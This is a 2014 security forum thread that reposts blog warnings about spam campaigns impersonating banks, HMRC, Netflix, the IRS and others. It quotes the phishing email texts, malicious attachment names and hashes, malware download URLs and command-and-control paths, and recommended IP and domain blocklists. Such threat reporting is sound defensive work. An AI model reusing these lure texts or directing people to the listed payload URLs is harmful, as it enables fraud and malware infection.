Jump to content


Photo

SPAM frauds, fakes, and other MALWARE deliveries...


  • Please log in to reply
1291 replies to this topic

#1251 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 07 August 2014 - 06:44 AM

FYI...

Fake CDS invoice SPAM
- http://blog.dynamoo....voice-spam.html
7 Aug 2014 - "This spam email pretends to be from the CDS Group. CDS are a wholly legitimate company and are NOT sending these emails, and their computer systems have NOT been compromised. However, the emails do contain a malicious attachment and should be deleted... CDS have a notice about these emails on their site*. This is a sample email:

Screenshot: https://3.bp.blogspo...0/s1600/cds.png

Attached is a archive file CDS_241-28195.zip which contains a folder invoice_cdsgroup_799543.xls which in turn contains a malicious executable invoice_cdsgroup_799543.xls.scr which has a very low detection rate at VirusTotal of 3/54**. Automated analysis tools are inconclusive at the moment..."
* http://www.cdsgroup....yber-crime.html

** https://www.virustot...sis/1407408295/

- http://threattrack.t...ds-invoice-spam
Aug 7 2014
- https://gs1.wac.edge...05XI1r6pupn.png
Tagged: cds, Lerspeng
___

Vawtrak sites to block
- http://blog.dynamoo....s-to-block.html
7 Aug 2014 - "I found these domains and IPs today while investigating a machine apparently infected with Vawtrak* (aka Tepfer), most of them seem to be active:
http ://80.243.184.239 /posting.php
http ://80.243.184.239 /viewforum.php
http ://146.185.233.97 /posting.php
http ://146.185.233.97 /viewforum.php
http ://ipubling .com/posting.php
http ://ipubling .com/viewforum.php
http ://magroxis .com/posting.php
http ://magroxis .com/viewforum.php
http ://maxigolon .com/viewforum.php
http ://terekilpane .com/viewforum.php
Some of these domains are associated with the email address ctouma2@ gmail .com. You could block the sites individually, but because the sites are not isolated, I would personally recommend using the following blocklist:
146.185.233.0/24
80.243.184.224/27

The 146.185.233.0/24 range is allocted to "Cherepanova" in Russia. 80.243.184.224/27 is Redstation in the UK."
* http://about-threats...KDR_VAWTRAK.YZY
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 07 August 2014 - 09:53 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1252 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 08 August 2014 - 05:51 AM

FYI...

Fake RBS SPAM
- http://blog.dynamoo....93549-spam.html
8 Aug 2014 - "This fake RBS spam has a malicious attachment:
    Date:      Thu, 24 Jul 2014 09:33:37 GMT [07/24/14 05:33:37 EDT]
    From:      Annie Wallace[Annie.Wallace@ rbs .co.uk]
    Subject:      RE: Incident IM03393549
    Good Afternoon ,
    Attached are more details regarding your account incident. Please extract the attached
    content and check the details.
    Please be advised we have raised this as a high priority incident and will endeavour to
    resolve it as soon as possible. The incident reference for this is IM03393549.
    We would let you know once this issue has been resolved, but with any further questions
    or issues, please let me know.
    Kind Regards, ...


The attachment is IM03393549.zip containing a malicious executable IM008082014.scr which has a VirusTotal detection rate of 15/42*. The CAMAS report** shows that the malware connects to the following locations to download additional components:
94.23.247.202 /n0808uk/SANDBOXA/0/51-SP2/0/
94.23.247.202 /n0808uk/SANDBOXA/1/0/0/
quesoslaespecialdechia .com/Scripts/n0808uk.zip
energysavingproductsinfo .com/wp-content/uploads/2014/08/n0808uk.zip
The exact nature of the malware is not known, but it is most likely a banking Trojan or Cryptowall.
Recommended blocklist:
94.23.247.202
quesoslaespecialdechia .com
energysavingproductsinfo .com
"
* https://www.virustot...sis/1407490764/

** http://camas.comodo....4663b54ab14b0a3
___

Fake Resume SPAM - malicious attachment
- http://blog.dynamoo....attachment.html
8 Aug 2014 - "This terse spam is malicious:
    Date:      Fri, 8 Aug 2014 05:57:02 +0700 [08/07/14 18:57:02 EDT]
    From:      Janette Sheehan [Janette.Sheehan@linkedin.com]
    Subject:      FW: Resume
    Attached is my resume, let me know if its ok.
    Thanks,
    Janette Sheehan


Attached is an archive Resume.zip which in turn contains a malicious executable Resume.scr. This has a VirusTotal detection rate of 24/54*. The CAMAS report** shows that the malware attempts to phone home to the following locations:
94.23.247.202 /0708stat/SANDBOXA/0/51-SP2/0/
94.23.247.202 /0708stat/SANDBOXA/1/0/0/
hngdecor .com/wp-content/uploads/2013/10/cw2800.zip
welfareofmankind .com/underconst/css/cw2800.zip
Recommended blocklist:
94.23.247.202
hngdecor .com
welfareofmankind .com
"
* https://www.virustot...sis/1407493005/

** http://camas.comodo....58b27ebf5a55d5b

94.23.247.202: https://www.virustot...02/information/
___

Fake HMRC tax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
7 Aug 2014 - "HMRC taxes application with reference 4DEW NASM CBCG RC6 received pretending to come from noreply@ taxreg .hmrc .gov .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    The application with reference number 4DEW NASM CBCG RC6 submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
    The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
    Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.


7 August 2014: 4DEW NASM CBCG RC6.zip (8kb) Extracts to 4DEW NASM CBCG RC6.scr
Current Virus total detections: 0/54* . This HMRC taxes application with reference 4DEW NASM CBCG RC6 received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407447014/
___

AmericanExpress - PHISH
- http://blog.dynamoo....rn-on-your.html
8 Aug 2014 - "This -fake- AmEx spam appears to lead to a phishing site on multiple URLs:

Screenshot: https://3.bp.blogspo.../amex-phish.png

In this case the link goes to a phishing site... but there seem to be a bunch of them at the moment... IPs in use are:
91.219.29.35 (FLP Kochenov Aleksej Vladislavovich, Ukraine)
188.240.32.75 (SC CH-NET SRL, Romania)
I recommend blocking these IPs (
91.219.29.35
188.240.32.75
"

91.219.29.35: https://www.virustot...35/information/

188.240.32.75: https://www.virustot...75/information/

- http://myonlinesecur...e-key-phishing/
8 Aug 2014
___

Fake e-on energy SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
8 Aug 2014 - "e-on energy Unable to process your most recent bill payment pretending to come from E ON Energy <noreply@ eonenergy .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
... Dear customer,
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause.


8 August 2014: e-ON-Energy-Bill.zip (15kb) : Extracts to e-ON-Energy-Bill.exe
Current Virus total detections: 7/54* . This e-on energy Unable to process your most recent bill payment is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407509103/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 08 August 2014 - 11:06 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1253 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 11 August 2014 - 01:00 PM

FYI...

Fake BoA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Aug 2014 - "Bank of America Alert: A Check Exceeded Your Requested Alert Limit pretending to come from Bank of America Alert <onlinebanking@ ealerts.bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Amount:     $32,095.35
Check number:     00000006756
Transaction date:     08/11/2014
You can sign in to Online or Mobile Banking to review this activity...
Security Checkpoint
To confirm the authenticity of messages from us, always look for this Security Checkpoint.
Remember: Always look for your SiteKey® before entering your Passcode. We’ll ask you for your Online ID and Passcode when you sign in.
This is a service email from Bank of America. Please note that you may receive service emails in accordance with your Bank of America service agreements..


11 August 2014: report081114_6897454147412.zip(10kb) : Extracts to report081114_6897454147412.exe
Current Virus total detections: 2/54* ... This Bank of America Alert: A Check Exceeded Your Requested Alert Limit is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407773230/
___

Citi Corp Spam
- http://threattrack.t...n-approved-spam
Aug 11, 2014 - "Subjects Seen:
    RE: Application Approved
Typical e-mail details:
    Your documents are ready , please sign them and email them back.
    Thank you
    Henri Foley
    Level III Account Management


Malicious File Name and MD5:
    application _apprd_93447836734346.exe  (CAD7B09903F7646EC37E4014DD6E70E4)
    application _apprd_93447836734346.zip (0B4A28D6737B9E27E7BF5B98DBBE6B84)


Screenshot: https://gs1.wac.edge...GBaE1r6pupn.png

Tagged: Citi, Upatre
___

Public Wi-Fi is safe?? ...
- http://nakedsecurity...safe-seriously/
11 Aug 2014 - "... most people still don't understand the potential dangers of public and/or free Wi-Fi, despite doom and gloom headlines about the dangers, which include these:
- A US trio who attacked companies by wardriving - i.e., driving around, scanning for poorly protected wireless networks. Between that and breaking in to install keyloggers, they bilked companies of a total of $3 million (£1.8 million).
- An unsecured Wi-Fi home connection that led to a heavily-armed police SWAT team raiding the wrong home, including breaking down the door of a house, smashing windows and tossing a flashbang stun grenade into a living room.
- Facebook accounts of five US politicians being hijacked after they accessed a free, open, wireless Wi-Fi network.
And those are just a tiny selection of the cherries on that bountiful Wi-Fi tree. Of course, there is also the problem of protecting privacy on public Wi-Fi. In just the past year, we learned that businesses are using Wi-Fi to build shopper profiles on us, and in-flight WiFi providers have been helping feds spy on us..."
(More detail at the sophos URL above.)
Sophos - wireless security myths Video 4:26:
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 11 August 2014 - 01:33 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1254 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 12 August 2014 - 04:48 AM

FYI...

Fake Netflix email / Phish
- http://myonlinesecur...f-837-phishing/
12 Aug 2014 - "Your Netflix Account Requires Validation [NVF-837] is an attempt to get access to your Netflix Account... The phishing website in this example is so closely named to the genuine Netflix site, that almost anybody could be fooled by it http ://netflix-validate .com
Email looks like:
Dear Customer,
We recently failed to validate your payment information we hold on record for your account, therefore we need to ask you to complete a brief validation process in order to verify your billing and payment details. Click here to verify your accountFailure to complete the validation process will result in a suspension of your netflix membership.We take every step needed to automatically validate our users, unfortunately in this case we were unable to verify your details. The process will only take a couple of minutes and will allow us to maintain our high standard of account security.
Netflix Support Team ...


Following the link in this 'Your Netflix Account Requires Validation' email or other spoofed emails  takes you to a website that looks exactly like the real Netflix site... then through loads of steps to input a lot of private and personal information, including billing address, date of birth and then to an update payment page, where they want credit card and bank details. Not only  will this information enable them to use your Netflix account, but also your Bank Account, credit card details, Email details, webspace..."

192.99.188.111: https://www.virustot...11/information/

Diagnostic page for AS16276 (OVH)
- https://www.google.c...c?site=AS:16276
"... over the past 90 days, 2638 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-08-11, and the last time suspicious content was found was on 2014-08-11... we found 373 site(s) on this network.. that appeared to function as intermediaries for the infection of 821 other site(s)... We found 745 site(s)... that infected 65282 other site(s)..."
___

Fake Order SPAM
- http://myonlinesecur...ke-pdf-malware/
12 Aug 2014 - "Order take 8753884 is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email with subject of Order take < random numbers> arrives with just a subject and no email content except an attachment. It appears to come from various random names at various random companies.

12 August 2014: order 1530875.zip (37 kb) : Extracts to   Order-8991617.exe
Current Virus total detections: 1/54* . This Order take 8753884 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407832220/
___

Fake new picture or video SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
12 Aug 2014 - "A new picture or video message  pretending to come from getmyphoto@ vodafone .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one wants you to download the -malware- via a tiny URL link in the email, there is no actual attachment. Email looks like:
You have received a picture message from mobile phone number +447584905118
GET MY FOTO
Please note, the free reply expires three days after the original message is sent from the Vodafone network.
Vodafone Service


12 August 2014: f679RqP75G.exe - Current Virus total detections: 0/53*
This 'A new picture or video message' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407835450/
___

Fake IRS phish...
- http://myonlinesecur...et-refund-card/
12 Aug 2014 - "IRS Get Refund On Your Card pretending to come from IRS <refund@ irs .gov> is one of the phishing attempts to get your bank and credit card information. Email looks like:
We are writing to you because your federal Tax payment (ID: 66116572), recently sent is available for refund.
For your security, new charges on the accounts listed above may be declined. If applicable, you should advise any Additional Card Member(s) on your account that their new charges may also be declined.
For more information, please visit the following link
– https ://sa.www4.irs .gov/irfof/lang/en/irfofgetstatus.jsp?reenter=true
Your prompt response regarding this matter is appreciated.
Sincerely,
IRS Refund Team


Following the link in this 'IRS Get Refund On Your Card' email or -other- spoofed emails takes you  to a website that looks exactly like the real IRS site... then through loads of steps to input a lot of private and personal information, including billing address, date of birth and then to an update payment page, where they want credit card and bank details... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them..."
 

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, 12 August 2014 - 10:41 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1255 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 13 August 2014 - 04:14 AM

FYI...

Fake Google drive SPAM - PDF malware
- http://myonlinesecur...019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@ < your email address>.pretending to come from Grady Murphy < random name that matches the name inside the email> , Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this  email leading to different infection sites and links, The names of the alleged Google Drive owner who wants to share with you changes with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
    Confirm request
    Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/


13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407913490/

178.238.236.109: https://www.virustot...09/information/
___

Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecur...alware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com  pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of word. On previewing it, or opening it  in Word 2013 ( which has macros disabled by default ) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...

13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...sis/1407936811/
___

UK Land Registry Spam
- http://threattrack.t...d-registry-spam
Aug 13, 2014 - "Subjects Seen:
    Notification of direct debit of fees
Typical e-mail details:
    Notification Number: 4682787
    Mandate Number: LND4682787
    ###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
    This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
    Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
    You can access these by opening attached report.
    If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
    Thank you,
    Land Registry


Malicious File Name and MD5:
    LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
    LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)


Screenshot: https://gs1.wac.edge...Ihd01r6pupn.png

Tagged: UK Land Registry, Upatre
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 13 August 2014 - 03:09 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1256 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 14 August 2014 - 05:50 AM

FYI...

Fake Citicorp SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

    From Securitas, please do not reply to this e-mail as it is auto generated.
    For any problems please e-mail derry.andrews@ securitas .uk .com


14 August 2014  Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54* . This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408010403/
___

Fake Charity Trends SPAM ...
- http://blog.mxlab.eu...9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is send from the spoofed address  and has the following body:

    Dear *******@*******.co.uk,
    Please find attached invoice #9156230_08 from 13/08/2014.
    Thanks!
    Reyes Mcdaniel .
    We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx


The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1408011038/

- http://blog.mxlab.eu...ontains-trojan/
Aug 14, 2014 - "... intercept a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is send from the spoofed address and has the following body:

    Charity Trends®
    Dear *******@*******.com,
    Thank you for your generous donation of 2623 GBP, which we received today.
    Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
    You will find all information about your donation in zip archive.You are making a difference!
    Thanks again for your kindness,
    Elsa Nash ...


The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Indside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen  or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustot...sis/1408011666/
___

Fake Citibank SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
    citibank .com
    RE: Account Documents
    To: <REDACTED>
    Case: C4055427
    Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
    All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...


14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54* . This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408029154/
___

ZeroLocker
- http://www.webroot.c...14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older crpytolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional​ red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot....08/blograrw.bmp
This newest edition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI untill all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___

Suspicious login message Faked, distributes Backdoor
- http://blog.trendmic...butes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmic...4/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmic...4/08/login2.png
...  while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised-  website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___

Beware of Risky Ads on Tumblr
- https://blog.malware...-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.

dailynewsz[dot]tumblr[dot]com

We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malware...ynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing...site=yllix.com/

** http://labs.sucuri.n...klist=yllix.com

*** https://www.mywot.co...ecard/yllix.com
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 14 August 2014 - 04:50 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1257 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 15 August 2014 - 09:03 AM

FYI...

Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu...ojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is send from the spoofed address “Barclays.NET” <support@ barclays .net>” and has the following body:
    Transaction is completed. 8678 GBP has been successfully transfered.
    If the transaction was made by mistake please contact our customer service.
    Payment receipt is attached.
    *** This is an automatically generated email, please do not reply ***
    Barclays.Net 2013 Corporation. All rights reserved.


The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1408097500/
___

Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu...d-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is send from the spoofed addresses and has the following body:
    Thank you for ordering from VOIP Inc.
    This message is to inform you that your order has been received and is currently being processed.
    Your order reference is 488910845598.
    You will need this in all correspondence.
    This receipt is NOT proof of purchase.
    We will send a printed invoice by mail to your billing address.
    You have chosen to pay by credit card. Your card will be charged for the amount
    of 805.74 USD and “VOIP Inc.”
    will appear next to the charge on your statement.
    Your purchase information appears below in the file.


The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. Once opening the Word document, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines did detect the trojan downloader at Virus Total*..."
* https://www.virustot...sis/1408099896/
 

:ph34r: :ph34r:  :grrr:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1258 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 19 August 2014 - 12:01 PM

FYI...

Fake Companies House Spam
- http://threattrack.t...ual-return-spam
Aug 19, 2014 - "Subjects Seen:
    (AR01) Annual Return received
Typical e-mail details:
    Thank you for completing a submission Reference # (9586474).
        (AR01) Annual Return
    Your unique submission number is 9586474
    Please quote this number in any communications with Companies House.
    Check attachment to confirm acceptance or rejection of this filing.


Malicious File Name and MD5:
    AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
    AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)


Screenshot: https://gs1.wac.edge...ZubX1r6pupn.png

Tagged: Companies House, Upatre
___

JPMorgan Chase Secure Message Spam
- http://threattrack.t...re-message-spam
Aug 19, 2014 - "Subjects Seen:
    Daily Report - August 19, 2014
Typical e-mail details:
   This is a secure, encrypted message.
    Desktop Users:
    Open the attachment (message_zdm.html) and follow the instructions.
    Mobile Users:
    Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.


Malicious URLs:
    192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe

Malicious File Name and MD5:
    message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
    Java_update.exe (38d75db0a575891506b1ff0484a03cd0)


Screenshot: https://gs1.wac.edge...JVOT1r6pupn.png

192.241.124.71: https://www.virustot...71/information/

Tagged: JPMorgan, Chase, Dyreza
___

- http://myonlinesecur...9-2014-malware/
